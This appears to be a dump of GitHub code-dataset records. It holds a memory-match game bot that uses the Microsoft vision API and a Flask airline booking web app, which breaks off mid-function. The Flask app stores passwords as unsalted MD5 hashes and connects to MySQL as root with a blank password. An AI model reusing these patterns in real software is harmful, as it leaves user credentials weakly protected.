head\n","repo_name":"sirutBuasai/leetcode","sub_path":"medium/reverse-linked-list-ii.py","file_name":"reverse-linked-list-ii.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"13241666011","text":"# . __ __ _ _ ____\n# | \\/ | __ _| |_ ___| |__ / ___| __ _ _ __ ___ ___\n# | |\\/| |/ _` | __/ __| '_ \\ | | _ / _` | '_ ` _ \\ / _ \\\n# | | | | (_| | || (__| | | | | |_| | (_| | | | | | | __/\n# |_| |_|\\__,_|\\__\\___|_| |_| \\____|\\__,_|_| |_| |_|\\___|\n\n\n# Estrategia \"blastoise\"\n\nbotName = \"baltazarortg-1\"\nimport requests\nimport json\nfrom random import sample, choice\nfrom time import sleep\n\n\nheaders_vision = {\n \"Ocp-Apim-Subscription-Key\": \"\",\n \"Content-Type\": \"application/octet-stream\",\n}\nvision_base_url = \"https://westeurope.api.cognitive.microsoft.com/vision/v2.0/\"\n\n# array con diccionarios que tienen keys: Index, State (ANALYSED, UNANALYSED, MATCHED), Subject y Category\nanalysed_tiles = []\n\nprevious_move = []\napi_calls = []\nmove_number = 0\nbonus_category = \"\"\nmatches_antes_fin_analisis = 0\n\n\ndef calculate_move(gamestate):\n global analysed_tiles\n global previous_move\n global move_number\n global bonus_category\n global matches_antes_fin_analisis\n\n # Variables del estado\n num_tiles = len(gamestate[\"Board\"])\n bonus_category = gamestate[\"Bonus\"].upper()\n\n if move_number == 0:\n categories_of_tiles = get_tiles_categories_from_backs(gamestate)\n print(\"Categories of tiles: {}\".format(categories_of_tiles))\n\n move_number += 1\n\n if gamestate[\"UpturnedTiles\"] == []:\n # No tendremos UpturnedTiles al comienzo del juego y cuando ultimo movimiento fue un match.\n print(\"{}. No upturned tiles for this move.\".format(move_number))\n else:\n # Mostrar los UpturnedTiles\n print(\n \"{}. ({}, {}) Upturned tiles for this move\".format(\n move_number,\n gamestate[\"UpturnedTiles\"][0][\"Index\"],\n gamestate[\"UpturnedTiles\"][1][\"Index\"],\n )\n )\n print(\" gamestate: {}\".format(gamestate))\n\n # Primer turno del juego\n if analysed_tiles == []:\n for index in range(num_tiles):\n # Mark tile as not analysed\n analysed_tiles.append({})\n analysed_tiles[index][\"Index\"] = index\n analysed_tiles[index][\"State\"] = \"UNANALYSED\"\n analysed_tiles[index][\"Category\"] = categories_of_tiles[index]\n analysed_tiles[index][\"Subject\"] = None\n\n # Si tenemos UpturnedTiles\n if gamestate[\"UpturnedTiles\"] != []:\n # Aqui se esta actualizando el array de analysed_tiles\n analyse_tiles(gamestate[\"UpturnedTiles\"], gamestate)\n else:\n # No es nuestro primer move en el juego\n if previous_move != []:\n print(\n \" MATCH: ({}, {}) - {}\".format(\n previous_move[0],\n previous_move[1],\n analysed_tiles[previous_move[0]][\"Subject\"],\n )\n )\n analysed_tiles[previous_move[0]][\"State\"] = \"MATCHED\"\n analysed_tiles[previous_move[1]][\"State\"] = \"MATCHED\"\n\n # Primer movimiento\n if move_number == 1:\n unanalysed_tiles = get_unanalysed_tiles()\n print(\n \"Len de unanalysed_tiles. Deberia ser n - 2. {}\".format(\n len(unanalysed_tiles)\n )\n )\n tile_a, tile_b = search_tiles_same_category(unanalysed_tiles, bonus_category)\n move = [tile_a, tile_b]\n matches_antes_fin_analisis += 1\n print(\" Primer movimiento: {}\".format(move))\n elif move_number <= len(gamestate[\"Board\"]) / 2:\n # Mientras esto sea verdad, continuamos explorando\n unanalysed_tiles = get_unanalysed_tiles()\n print(\n \"Len de unanalysed_tiles. Deberia reducirse por 2 cada vez {}\".format(\n len(unanalysed_tiles)\n )\n )\n\n if search_tiles_same_category(unanalysed_tiles, bonus_category):\n # Afortunado. Puedo investigar y ademas tener la probabilidad de hacer match\n tile_a, tile_b = search_tiles_same_category(\n unanalysed_tiles, bonus_category\n )\n move = [tile_a, tile_b]\n matches_antes_fin_analisis += 1\n print(\"Match categorico encontrado. {}\".format(move))\n else:\n # Ni modo, pero puedo seguir investigando\n print(\"Seguimos investigando\")\n tile_a, tile_b = unanalysed_tiles[0], unanalysed_tiles[1]\n move = [tile_a, tile_b]\n print(\"Nuevo move. {}\".format(move))\n else:\n # Ya podemos comenzar a hacer matches\n print(\n \"Matches encontrados durante el analisis: {}\".format(\n matches_antes_fin_analisis\n )\n )\n unanalysed_tiles = get_unanalysed_tiles()\n\n match = search_for_matching_titles_bonus()\n if match is not None:\n print(\" Matching Move: {}\".format(match))\n move = match\n else:\n match = search_for_matching_tiles()\n # If SI tenemos un match\n if match is not None:\n\n print(\" Matching Move: {}\".format(match))\n move = match\n # La actualizacion a MATCHED ocurre en el proximo turno cuando UpturnedTiles == [] y el previous_move != []\n\n else:\n unanalysed_tiles = get_unanalysed_tiles()\n if unanalysed_tiles != []:\n\n move = sample(unanalysed_tiles, 2)\n else:\n\n unmatched_tiles = get_unmatched_tiles()\n\n move = sample(unmatched_tiles, 2)\n\n previous_move = move\n return {\"Tiles\": move}\n\n\ndef search_for_matching_tiles():\n for index_1, tile_1 in enumerate(analysed_tiles):\n for index_2, tile_2 in enumerate(analysed_tiles):\n if (\n tile_1[\"State\"] == tile_2[\"State\"] == \"ANALYSED\"\n and tile_1[\"Subject\"] == tile_2[\"Subject\"]\n and tile_1[\"Subject\"] is not None\n and index_1 != index_2\n ):\n return [index_1, index_2]\n return None\n\n\ndef search_for_matching_titles_bonus():\n for index_1, tile_1 in enumerate(analysed_tiles):\n for index_2, tile_2 in enumerate(analysed_tiles):\n if (\n tile_1[\"State\"] == tile_2[\"State\"] == \"ANALYSED\"\n and tile_1[\"Subject\"] == tile_2[\"Subject\"]\n and tile_1[\"Subject\"] is not None\n and tile_1[\"Category\"] == tile_2[\"Category\"] == bonus_category\n and index_1 != index_2\n ):\n return [index_1, index_2]\n return None\n\n\ndef search_tiles_same_category(tiles_indeces, category):\n tiles_to_search = []\n\n for idx in tiles_indeces:\n tile_to_add = analysed_tiles[idx]\n tile_to_add[\"original_idx\"] = analysed_tiles[idx][\"Index\"]\n tiles_to_search.append(tile_to_add)\n\n for index_1, tile_1 in enumerate(tiles_to_search):\n for index_2, tile_2 in enumerate(tiles_to_search):\n if (\n tile_1[\"Category\"] == tile_2[\"Category\"] == category\n and tile_1[\"Category\"] is not None\n and tile_1[\"original_idx\"] != tile_2[\"original_idx\"]\n ):\n\n return [tile_1[\"original_idx\"], tile_2[\"original_idx\"]]\n # print(\"NO se encontro match categorico\")\n return None\n\n\n# Son los no analizados (obviamente) y los ya analizados, que no tienen match\ndef get_unmatched_tiles():\n unmatched_tiles = []\n # For every tile in the game\n for index, tile in enumerate(analysed_tiles):\n if tile[\"State\"] != \"MATCHED\":\n unmatched_tiles.append(index)\n return unmatched_tiles\n\n\ndef get_unanalysed_tiles():\n unanalysed_tiles = []\n for index, tile in enumerate(analysed_tiles):\n if tile[\"State\"] == \"UNANALYSED\":\n unanalysed_tiles.append(index)\n return unanalysed_tiles\n\n\n# Va a analizar de dos en dos\ndef analyse_tiles(tiles, gamestate):\n for tile in tiles:\n analyse_tile(tile, gamestate)\n\n\n# Determina la categoria\ndef analyse_tile(tile, gamestate):\n if analysed_tiles[tile[\"Index\"]][\"State\"] != \"UNANALYSED\":\n return\n\n # Call analysis\n analyse_url = vision_base_url + \"analyze\" # Use analyze API function\n # List of the features that we want to get\n params_analyse = {\n \"visualFeatures\": \"categories,tags,description,faces,imageType,color\",\n \"details\": \"celebrities,landmarks\",\n }\n data = {\"url\": tile[\"Tile\"]}\n msapi_response = microsoft_api_call(\n analyse_url, params_analyse, headers_vision, data\n )\n print(\" API Result tile #{}: {}\".format(tile[\"Index\"], msapi_response))\n\n subject = check_for_landmark(msapi_response)\n\n if subject is None:\n subject = check_for_animal(msapi_response, gamestate[\"AnimalList\"])\n if subject is None:\n subject = check_for_text(tile)\n else:\n print(\" Animal at tile #{}: {}\".format(tile[\"Index\"], subject))\n analysed_tiles[tile[\"Index\"]][\"State\"] = \"ANALYSED\"\n analysed_tiles[tile[\"Index\"]][\"Subject\"] = subject\n\n\ndef check_for_animal(msapi_response, animal_list):\n subject = None\n if \"tags\" in msapi_response:\n for tag in sorted(\n msapi_response[\"tags\"], key=lambda x: x[\"confidence\"], reverse=True\n ):\n if \"name\" in tag and tag[\"name\"] in animal_list:\n subject = tag[\"name\"].lower()\n print(\" Animal: {}\".format(subject))\n break\n # Return the subject\n return subject\n\n\ndef check_for_text(tile):\n subject = None\n\n # Call analysis\n analyse_url = vision_base_url + \"ocr\" # Use OCR API function\n params_analyse = {}\n data = {\"url\": tile[\"Tile\"]}\n msapi_response = microsoft_api_call(\n analyse_url, params_analyse, headers_vision, data\n )\n\n print(\"OCR Response: {}\".format(msapi_response))\n\n if \"regions\" in msapi_response: # Checando si el dict tiene ese key\n if msapi_response[\"regions\"]:\n if \"lines\" in msapi_response[\"regions\"][0]:\n if \"words\" in msapi_response[\"regions\"][0][\"lines\"][0]:\n if \"text\" in msapi_response[\"regions\"][0][\"lines\"][0][\"words\"][0]:\n subject = msapi_response[\"regions\"][0][\"lines\"][0][\"words\"][0][\n \"text\"\n ]\n print(\"***OCR text: {}\".format(subject))\n\n return subject\n\n\ndef get_tiles_categories_from_backs(gamestate):\n # Lista con strings\n categories_of_tiles = []\n\n # Call analysis\n analyse_url = vision_base_url + \"ocr\" # Use OCR API function\n params_analyse = {}\n\n for tile in gamestate[\"TileBacks\"]:\n category = \"\"\n data = {\"url\": tile}\n msapi_response = microsoft_api_call(\n analyse_url, params_analyse, headers_vision, data\n )\n if \"regions\" in msapi_response: # Checando si el dict tiene ese key\n if msapi_response[\"regions\"]:\n if \"lines\" in msapi_response[\"regions\"][0]:\n if \"words\" in msapi_response[\"regions\"][0][\"lines\"][0]:\n if (\n \"text\"\n in msapi_response[\"regions\"][0][\"lines\"][0][\"words\"][0]\n ):\n category = (\n msapi_response[\"regions\"][0][\"lines\"][0][\"words\"][0][\n \"text\"\n ]\n + \"S\"\n )\n categories_of_tiles.append(category)\n print(\"***OCR Categoria en back: {}\".format(category))\n return categories_of_tiles\n\n\ndef check_for_landmark(msapi_response):\n\n subject = None\n\n for category in msapi_response[\"categories\"]:\n\n if (\n \"detail\" in category\n and \"landmarks\" in category[\"detail\"]\n and category[\"detail\"][\"landmarks\"]\n ):\n\n subject = category[\"detail\"][\"landmarks\"][0][\"name\"].lower()\n\n print(\"Landmark: {}\".format(subject))\n break\n\n return subject\n\n\n# Call the Microsoft API to analyse the image and to return information\n# about the contents of the image.\n#\n# Inputs:\n# url: string - The Microsoft API endpoint\n# params: dictionary - Which Computer Vision services should the request check for\n# headers: dictionary - API Key to allow request to be made\n# data: dictionary - The image that we want the API to analyse\n# Outputs:\n# JSON dictionary - The result of the API call\n#\ndef microsoft_api_call(url, params, headers, data):\n retry_count = 0\n res = {}\n\n while (\"error\" in res and res[\"error\"][\"code\"] == \"429\") or res == {}:\n # Make API request and record the results\n try:\n r = requests.get(data[\"url\"], allow_redirects=True)\n response = requests.post(\n url, headers=headers_vision, params=params, data=r.content\n )\n res = response.json() # Convert result to JSON\n except Exception as e:\n retry_count += 1\n # print(f\" [WARN] ({retry_count}) There was an issue making the Microsoft API request, retrying...\")\n # print(f\" {e}\")\n\n return res\n\n\n# Test the user has used a valid subscription key\ndef valid_subscription_key():\n # Make a computer vision api call\n params_analyse = {\"visualFeatures\": \"categories,tags\", \"details\": \"landmarks\"}\n data = {\"url\": \"https://www.aigaming.com/Images/aiWebsiteLogo.png\"}\n\n test_api_call = microsoft_api_call(\n vision_base_url + \"analyze\", params_analyse, headers_vision, data\n )\n\n if \"error\" in test_api_call:\n raise ValueError(\n \"Invalid Microsoft Computer Vision API key for current region: {}\".format(\n test_api_call\n )\n )\n\n\n# Check the subscription key\nvalid_subscription_key()\n","repo_name":"Baltazar-Ortega/bot_podio","sub_path":"blastoise.py","file_name":"blastoise.py","file_ext":"py","file_size_in_byte":13917,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"7655275696","text":"#Import Flask Library\r\nfrom flask import Flask, render_template, request, session, url_for, redirect, Markup\r\nimport pymysql.cursors\r\nfrom datetime import datetime\r\nimport random\r\n#Initialize the app from Flask\r\napp = Flask(__name__)\r\n\r\n#Configure MySQL\r\nconn = pymysql.connect(host='localhost',\r\n user='root',\r\n password='',\r\n db='project_1',\r\n charset='utf8mb4',\r\n cursorclass=pymysql.cursors.DictCursor)\r\n\r\n#Define a route to hello function\r\n@app.route('/')\r\ndef hello():\r\n try:\r\n session['customer'] != None\r\n except KeyError:\r\n try:\r\n session['staff'] != None\r\n except KeyError:\r\n return render_template('index.html')\r\n else:\r\n return redirect(url_for('staff_home'))\r\n else:\r\n return redirect(url_for('customerHome'))\r\n # session['customer'] != None:\r\n # return redirect(url_for('customerHome'))\r\n # elif session['staff'] != None:\r\n # return redirect(url_for('staff_home'))\r\n # else:\r\n # return render_template('index.html')\r\n\r\n@app.route('/public_info')\r\ndef publicInfo():\r\n return render_template('public_info.html')\r\n\r\n@app.route('/flight_search')\r\ndef flightSearch():\r\n return render_template('flight_search.html')\r\n\r\n@app.route('/flightStatusAction', methods = ['POST'])\r\ndef flightStatusAction():\r\n dept_city_airport = request.form['dept_city']\r\n dept_date = request.form['dept_date']\r\n airline = request.form['airline']\r\n flight_no = request.form['flight_no']\r\n cursor = conn.cursor()\r\n query = '''SELECT flight_no, airline, dep_datetime, status\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n INNER JOIN airport a2 on flight.arr_airport = a2.name\r\n WHERE (dep_airport = %s OR a1.city = %s)\r\n AND flight_no = %s\r\n AND DATE(dep_datetime) = %s\r\n AND airline = %s;'''\r\n cursor.execute(query, (dept_city_airport, dept_city_airport, flight_no, dept_date, airline))\r\n data = cursor.fetchone()\r\n cursor.close()\r\n if data:\r\n return render_template('flight_status.html', message = data)\r\n else:\r\n error = 'flight not found, please search again'\r\n return render_template('flight_status.html', error = error)\r\n\r\n\r\n@app.route('/flightSearchAction', methods = ['POST'])\r\ndef flightSearchAction():\r\n dept_city_airport = request.form['dept_city']\r\n dest_city_airport = request.form['dest_city']\r\n dept_date = request.form['dept_date']\r\n ret_date = request.form['ret_date']\r\n cursor = conn.cursor()\r\n if ret_date == '':\r\n query = '''SELECT flight_no, airline, dep_datetime, arr_datetime,\r\n dep_airport, arr_airport, a1.city AS dep_city, a2.city AS arr_city\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n INNER JOIN airport a2 on flight.arr_airport = a2.name\r\n WHERE (dep_airport = %s OR a1.city = %s) AND (arr_airport = %s OR a2.city = %s)\r\n AND DATE(dep_datetime) = %s;'''\r\n cursor.execute(query, (dept_city_airport, dept_city_airport, dest_city_airport, dest_city_airport, dept_date))\r\n else:\r\n query = '''SELECT flight_no, airline, dep_datetime, arr_datetime,\r\n dep_airport, arr_airport, a1.city AS dep_city, a2.city AS arr_city\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n INNER JOIN airport a2 on flight.arr_airport = a2.name\r\n WHERE ((dep_airport = %s OR a1.city = %s) AND (arr_airport = %s OR a2.city = %s)\r\n AND DATE(dep_datetime) = %s) OR ((dep_airport = %s OR a1.city = %s) AND (arr_airport = %s OR a2.city = %s)\r\n AND DATE(dep_datetime) = %s);'''\r\n cursor.execute(query, (dept_city_airport, dept_city_airport, dest_city_airport, dest_city_airport, dept_date, dest_city_airport, dest_city_airport, dept_city_airport, dept_city_airport, ret_date))\r\n data = cursor.fetchall()\r\n cursor.close()\r\n if data:\r\n return render_template('flight_search.html', message = data)\r\n else:\r\n error = 'no flight available, please search again'\r\n return render_template('flight_search.html', error = error)\r\n\r\n\r\n@app.route('/flight_status')\r\ndef flightStatus():\r\n return render_template('flight_status.html')\r\n#Define route for login\r\n@app.route('/customer_login')\r\ndef loginCustomer():\r\n\treturn render_template('customer_login.html')\r\n#Define route for login\r\n@app.route('/staff_login')\r\ndef loginStaff():\r\n\treturn render_template('staff_login.html')\r\n#Define route for customer register\r\n@app.route('/customer_register')\r\ndef registerCustomer():\r\n\treturn render_template('customer_register.html')\r\n#Define route for staff register\r\n@app.route('/staff_register')\r\ndef registerStaff():\r\n\treturn render_template('staff_register.html')\r\n#Authenticates the login\r\n@app.route('/loginAuthCustomer', methods=['GET', 'POST'])\r\ndef loginAuthCustomer():\r\n\t#grabs information from the forms\r\n\tusername = request.form['username']\r\n\tpassword = request.form['password']\r\n\r\n\t#cursor used to send queries\r\n\tcursor = conn.cursor()\r\n\t#executes query\r\n\tquery = 'SELECT * FROM customer WHERE email = %s and password = MD5(%s)'\r\n\tcursor.execute(query, (username, password))\r\n\t#stores the results in a variable\r\n\tdata = cursor.fetchone()\r\n\t#use fetchall() if you are expecting more than 1 data row\r\n\tcursor.close()\r\n\terror = None\r\n\tif(data):\r\n\t\t#creates a session for the the user\r\n\t\t#session is a built in\r\n\t\tsession['customer'] = data\r\n\t\treturn redirect(url_for('customerHome'))\r\n\telse:\r\n\t\t#returns an error message to the html page\r\n\t\terror = 'Invalid login or username'\r\n\t\treturn render_template('customer_login.html', error=error)\r\n#Authenticates the login\r\n@app.route('/loginAuthStaff', methods=['GET', 'POST'])\r\ndef loginAuthStaff():\r\n\t#grabs information from the forms\r\n\tusername = request.form['username']\r\n\tpassword = request.form['password']\r\n\r\n\t#cursor used to send queries\r\n\tcursor = conn.cursor()\r\n\t#executes query\r\n\tquery = 'SELECT * FROM airline_staff WHERE user_name = %s and password = MD5(%s)'\r\n\tcursor.execute(query, (username, password))\r\n\t#stores the results in a variable\r\n\tdata = cursor.fetchone()\r\n\t#use fetchall() if you are expecting more than 1 data row\r\n\tcursor.close()\r\n\terror = None\r\n\tif(data):\r\n\t\t#creates a session for the the user\r\n\t\t#session is a built in\r\n\t\tsession['staff'] = data\r\n\t\treturn redirect(url_for('staff_home'))\r\n\telse:\r\n\t\t#returns an error message to the html page\r\n\t\terror = 'Invalid login or username'\r\n\t\treturn render_template('staff_login.html', error=error)\r\n#Authenticates the register for customer\r\n@app.route('/registerAuthCustomer', methods=['GET', 'POST'])\r\ndef registerAuthCustomer():\r\n\t#grabs information from the forms\r\n email = request.form['email']\r\n password = request.form['password']\r\n name = request.form['name']\r\n phone_no = request.form['phone_no']\r\n date_of_birth = request.form['date_of_birth']\r\n passport_no = request.form['passport_no']\r\n passport_exp = request.form['passport_exp']\r\n passport_country = request.form['passport_country']\r\n state = request.form['state']\r\n city = request.form['city']\r\n street = request.form['street']\r\n building_no = request.form['building_no']\r\n\t#cursor used to send queries\r\n cursor = conn.cursor()\r\n\t#executes query\r\n query = 'SELECT * FROM customer WHERE email = %s'\r\n cursor.execute(query, (email))\r\n\t#stores the results in a variable\r\n data = cursor.fetchone()\r\n\t#use fetchall() if you are expecting more than 1 data row\r\n error = None\r\n if(data):\r\n\t\t#If the previous query returns data, then user exists\r\n\t error = \"This user already exists\"\r\n\t return render_template('customer_register.html', error = error)\r\n else:\r\n\t ins = 'INSERT INTO customer VALUES(%s, MD5(%s), %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'\r\n\t cursor.execute(ins, (email, password, name, phone_no, date_of_birth, passport_no, passport_exp, passport_country, state, city, street, building_no))\r\n\t conn.commit()\r\n\t cursor.close()\r\n\t return render_template('index.html')\r\n@app.route('/registerAuthStaff', methods=['GET', 'POST'])\r\n# staff register\r\ndef registerAuthStaff():\r\n\t#grabs information from the forms\r\n user_name = request.form['username']\r\n password = request.form['password']\r\n first_name = request.form['first_name']\r\n last_name = request.form['last_name']\r\n date_of_birth = request.form['date_of_birth']\r\n airline = request.form['airline']\r\n\t#cursor used to send queries\r\n cursor = conn.cursor()\r\n\t#executes query\r\n query = 'SELECT * FROM airline_staff WHERE user_name = %s'\r\n cursor.execute(query, (user_name))\r\n\t#stores the results in a variable\r\n data = cursor.fetchone()\r\n\t#use fetchall() if you are expecting more than 1 data row\r\n error = None\r\n if(data):\r\n\t\t#If the previous query returns data, then user exists\r\n error = \"This user already exists\"\r\n return render_template('staff_register.html', error = error)\r\n else:\r\n ins = 'INSERT INTO airline_staff VALUES(%s, MD5(%s), %s, %s, %s, %s)'\r\n cursor.execute(ins, (user_name, password, first_name, last_name, date_of_birth, airline))\r\n conn.commit()\r\n cursor.close()\r\n return render_template('index.html')\r\n\r\n@app.route('/view_flights')\r\ndef view_flights():\r\n return render_template('view_flights.html')\r\n\r\n@app.route('/viewFlightsAction', methods=['GET', 'POST'])\r\ndef viewFlightsAction():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n start_date = request.form['start_date']\r\n end_date = request.form['end_date']\r\n dep_city = request.form['dept_city']\r\n dest_city = request.form['dest_city']\r\n cursor = conn.cursor();\r\n query = '''SELECT flight.flight_no as flight_no,\r\n flight.dep_datetime as dep_datetime,\r\n arr_datetime, base_price, seat_sold, dep_airport, arr_airport\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n INNER JOIN airport a2 on flight.arr_airport = a2.name\r\n WHERE (airline = %s)\r\n AND (DATE(dep_datetime) >= %s)\r\n AND (DATE(dep_datetime) <= %s)\r\n AND (flight.dep_airport LIKE %s OR a1.city LIKE %s)\r\n AND (flight.arr_airport LIKE %s OR a2.city LIKE %s)'''\r\n if start_date == '':\r\n start_date = 'dep_datetime'\r\n if end_date == '':\r\n end_date = 'dep_datetime'\r\n if dep_city == '':\r\n dep_city = '%'\r\n if dest_city == '':\r\n dest_city = '%'\r\n print(dep_city)\r\n cursor.execute(query, (airline, start_date, end_date, dep_city, dep_city, dest_city, dest_city))\r\n message = cursor.fetchall()\r\n cursor.close()\r\n print(message)\r\n if message:\r\n return render_template('view_flights.html', message = message)\r\n else:\r\n return render_template('view_flights.html', error = 'no flights found based on your conditions!')\r\n\r\n@app.route('/view_pass')\r\ndef view_pass():\r\n return render_template('view_pass.html')\r\n\r\n@app.route('/viewPassAction', methods=['GET', 'POST'])\r\ndef viewPassAction():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n dept_city = request.form['dept_city']\r\n flight_no = request.form['flight_no']\r\n dept_date = request.form['dept_date']\r\n cursor = conn.cursor();\r\n query = '''SELECT take.email as email, customer.name as name\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n NATURAL JOIN take\r\n INNER JOIN customer on customer.email = take.email\r\n WHERE (airline = %s)\r\n AND (DATE(dep_datetime) = %s)\r\n AND (flight.flight_no = %s)\r\n AND (dep_airport = %s OR a1.city = %s)'''\r\n cursor.execute(query, (airline, dept_date, flight_no, dept_city, dept_city))\r\n message = cursor.fetchall()\r\n cursor.close()\r\n print(message)\r\n if message:\r\n return render_template('view_pass.html',message = message)\r\n else:\r\n return render_template('view_pass.html',error = 'no passenger found on said flight')\r\n\r\n@app.route('/create_flight')\r\ndef create_flight():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n cursor = conn.cursor();\r\n query = '''SELECT * FROM flight\r\n WHERE (airline = %s)\r\n AND (dep_datetime BETWEEN NOW() AND DATE_ADD(NOW(), INTERVAL 30 DAY));'''\r\n cursor.execute(query, (airline))\r\n message = cursor.fetchall()\r\n cursor.close()\r\n return render_template('create_flight.html', message = message)\r\n@app.route('/createFlightAction', methods=['POST'])\r\ndef createFlightAction():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n flight_no = request.form['flight_no']\r\n dep_datetime = request.form['dep_datetime']\r\n arr_datetime = request.form['arr_datetime']\r\n status = request.form['status']\r\n base_price = request.form['base_price']\r\n seat_sold = request.form['seat_sold']\r\n dept_airport = request.form['dept_airport']\r\n arr_airport = request.form['arr_airport']\r\n airplane_id = request.form['airplane_id']\r\n cursor = conn.cursor();\r\n query = '''INSERT INTO `flight` (`flight_no`, `airline`, `dep_datetime`,\r\n `arr_datetime`, `status`, `base_price`, `seat_sold`, `dep_airport`, `arr_airport`, `airplane_id`)\r\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s);'''\r\n try:\r\n cursor.execute(query, (flight_no, airline, dep_datetime, arr_datetime,\r\n status, base_price, seat_sold, dept_airport, arr_airport, airplane_id))\r\n conn.commit()\r\n except pymysql.Error:\r\n render_template('create_flight.html', error = 'flight already exists!')\r\n cursor.close()\r\n return redirect(url_for('create_flight'))\r\n\r\n@app.route('/change_status')\r\ndef change_status():\r\n return render_template('change_status.html')\r\n\r\n@app.route('/changeStatusAction', methods=['POST'])\r\ndef changeStatusAction():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n flight_no = request.form['flight_no']\r\n dep_date = request.form['dept_date']\r\n dept_airport = request.form['dept_airport']\r\n status = request.form['status']\r\n cursor = conn.cursor();\r\n query = '''UPDATE flight\r\n SET status = %s\r\n WHERE (airline = %s) AND (flight_no = %s) AND (DATE(dep_datetime) = %s) AND (dep_airport = %s)'''\r\n try:\r\n cursor.execute(query, (status, airline, flight_no, dep_date, dept_airport))\r\n conn.commit()\r\n except pymysql.Error:\r\n render_template('change_status.html', error = 'Flight Not Found!')\r\n cursor.close()\r\n return render_template('change_status.html', error = 'Status Changed!')\r\n\r\n@app.route('/add_airplane')\r\ndef add_airplane():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n cursor = conn.cursor();\r\n query = '''SELECT * FROM airplane\r\n WHERE (airline = %s);'''\r\n cursor.execute(query, (airline))\r\n message = cursor.fetchall()\r\n cursor.close()\r\n return render_template('add_airplane.html', message = message)\r\n@app.route('/addAirplane', methods=['POST'])\r\ndef addAirplane():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n airplane_id = request.form['airplane_id']\r\n capacity = request.form['capacity']\r\n cursor = conn.cursor();\r\n query = '''INSERT INTO `airplane` (`airplane_id`, `airline`, `capacity`)\r\n VALUES (%s, %s, %s);'''\r\n try:\r\n cursor.execute(query, (airplane_id, airline, capacity))\r\n conn.commit()\r\n except pymysql.IntegrityError:\r\n return render_template('add_airplane.html', error = 'plane ID already exists!')\r\n cursor.close()\r\n return redirect(url_for('add_airplane'))\r\n\r\n@app.route('/add_airport')\r\ndef add_airport():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n cursor = conn.cursor();\r\n query = '''SELECT * FROM airport;'''\r\n cursor.execute(query)\r\n message = cursor.fetchall()\r\n cursor.close()\r\n return render_template('add_airport.html', message = message)\r\n@app.route('/addAirport', methods=['POST'])\r\ndef addAirport():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n name = request.form['name']\r\n city = request.form['city']\r\n cursor = conn.cursor();\r\n query = '''INSERT INTO `airport` (`name`, `city`)\r\n VALUES (%s, %s);'''\r\n try:\r\n 